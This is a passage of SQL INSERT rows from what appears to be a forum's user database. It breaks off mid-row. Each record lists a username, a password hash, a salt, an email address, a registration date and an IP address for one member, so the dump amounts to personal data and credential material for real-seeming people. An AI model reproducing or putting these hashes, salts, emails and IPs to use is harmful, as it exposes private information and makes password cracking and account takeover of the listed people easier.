(359, 2, '', 0, 'Sinatra', '66f98fa17de880bca495dff21d3fe9a2', '2015-12-27', 'ms100200@web.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451269470, 0, 1451269470, 1451269507, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.2', 0, 1, 0, 0, -1, 0, 0, '\'`Wq>*2H\'rs[&1od<7VQ\"8b+2$\\FNX', 0, 0, 0, '', 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(360, 2, '', 0, 'JoshRanson', '5d2e3b1a7bfd97616fb6b6956c931412', '2015-12-28', 'leiatriplett1693@manifestgenerator.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451360940, 0, 1451360940, 1451360940, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.96', 0, 1, 0, 0, -1, 0, 0, '\\7gN@\"\"\\c^QAu/@Z3>Nkc/>];>t97v', 0, 0, 0, '', 0, 0, 70, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(361, 2, '', 0, 'FlorianSer', '3182befb19b221bb7d773983240e4de5', '2015-12-29', 'madelainecastella9346@pfui.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451407716, 0, 1451407716, 1451407716, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.84', 0, 1, 0, 0, -1, 0, 0, 'Se`wf=rG}F|D1EAcpetO-%rb}W^p;n', 0, 0, 0, '', 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(362, 2, '', 0, 'BobSlavin', '1fb8c3ab96df4a73b3cea20c9037b9a6', '2015-12-29', 'charliedens@cachedot.net', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451436276, 0, 1451436276, 1451436276, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.84', 0, 1, 0, 0, -1, 0, 0, 'Ai=f?`yJ?rR?pf&4!`LUi^\"GzqFOMZ', 0, 0, 0, '', 0, 0, 54, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(365, 2, '', 0, 'HeribertoP', '7ca46e136c76589bde3e6ea58cb0a920', '2016-01-01', 'magdabyron@0815.su', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451648900, 0, 1451648900, 1451648900, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.92', 0, 1, 0, 0, -1, 0, 0, '_^w\'^0t)XbmwcU.$XDlKi|U8f9Fj6B', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(366, 2, '', 0, 'KendraChon', '226ae4c1020da7c791b506f707065f5c', '2016-01-02', 'fernesliva358@hulapla.de', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451714197, 0, 1451714197, 1451714197, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.87', 0, 1, 0, 0, -1, 0, 0, '0KhS5aDzXTZR<}~[-g%VKU08`OLiBo', 0, 0, 0, '', 0, 0, 61, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(367, 2, '', 0, 'PYDDamion', '6df31c2bbe5a5f8d0fba1a1fd54c0d5c', '2016-01-03', 'earthaoreilly2257@discard.email', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451846721, 0, 1451846721, 1451846721, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.203.89', 0, 1, 0, 0, -1, 0, 0, '3C9K\\anMc$[@^\"]]Lp@#T9*Na7D(UU', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(368, 2, '', 0, 'HildegardB', 'a1a884d1e8da3217e115b83263e6bd76', '2016-01-04', 'patryk.barski@onet.pl', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1451960090, 0, 1451960090, 1451960090, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.88.4', 0, 1, 0, 0, -1, 0, 0, 'z\\chT1Cz}].SxP.Hwn_!KAbR~M\"0@k', 0, 0, 0, '', 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(369, 2, '', 0, 'mouse55', '6595288c0470658d8f55a99363e34c21', '2016-01-06', 'mouse55@yopmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452074203, 0, 1452074312, 1461944381, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '173.245.53.71', 0, 1, 0, 0, -1, 0, 0, 'tq6=1\'D:5w|>,\"mU7y=~>pXd', 0, 0, 0, '', 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(371, 2, '', 0, 'TaniaSdc22', 'ebd0b46f3e9dba610bb6c4162d697c39', '2016-01-06', 'frederickwisniewski@germanmails.biz', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452102172, 0, 1452102172, 1452102172, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '162.158.202.7', 0, 1, 0, 0, -1, 0, 0, '\"LazpRgG9CBFDaVKBI._#gLh%c6/O?', 0, 0, 0, '', 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(372, 2, '', 0, 'atn.seller16', '9a78d061e02ceba8f19e32ef67315361', '2016-01-07', 'anti.breeze@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452211656, 0, 1452211656, 1452211671, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '197.234.243.52', 0, 1, 0, 0, -1, 0, 0, 'jfW~$lLy(1{m\\],KDC$pZ-Nq!njAv=', 0, 0, 0, '', 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(373, 2, '', 0, 'ZellaEdmon', '01c7faea4f9866a3548d2c12f6986ca0', '2016-01-08', 'siblaserna@yahoo.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452295103, 0, 1452295103, 1452295103, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.56.184', 0, 1, 0, 0, -1, 0, 0, '\"q3U}7zi+{k\"W+~1.<0w+#sQKc/\\nr', 0, 0, 0, '', 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(374, 2, '', 0, 'Serpents0n', 'fcf357bc6a25996f026ea88d1e8f75d4', '2016-01-08', 'Serpentson@protonmail.ch', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452297609, 0, 1459042666, 1459042666, 0, 0, 0, 0, 4, '-6', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.238.28', 0, 1, 0, 0, -1, 0, 0, 'xN&\';c~e_k&_,dti_Jr-JSlr@%<:/', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(378, 2, '', 0, 'troubler', '728fe722171735fbc4cc00b2f2567e11', '2016-01-11', 'knotty.enough@googlemail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452546600, 0, 1452546600, 1462445422, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091911, '', '0000-00-00', -1, -1, '141.101.98.251', 0, 1, 0, 0, -1, 0, 0, '6?*f$z6f>9X#x3oaZ15[nzv6.7*<_G', 0, 0, 0, '', 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(379, 2, '', 0, 'MelvaHackl', '86ab18b541761254f9b469084afdf7da', '2016-01-12', 'tanya.tyutyakina@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452629956, 0, 1452629956, 1452629956, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '173.245.56.195', 0, 1, 0, 0, -1, 0, 0, '@RxkUbQ])^l4EmUgG)rLLR`*N]*oJn', 0, 0, 0, '', 0, 0, 49, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''),
(380, 2, '', 0, 'ShannonCar', '09c9048e1646a0512a7af04f63e8bf6e', '2016-01-13', 'karol.razer@onet.pl', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1452711690, 0, 1452711690, 1452711690, 0, 0, 0, 0, 4, '4', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '108.162.238.7', 0, 1, 0, 0, -1, 0, 0, 'o=(GEf^.J1L/e%WVW5ec\\$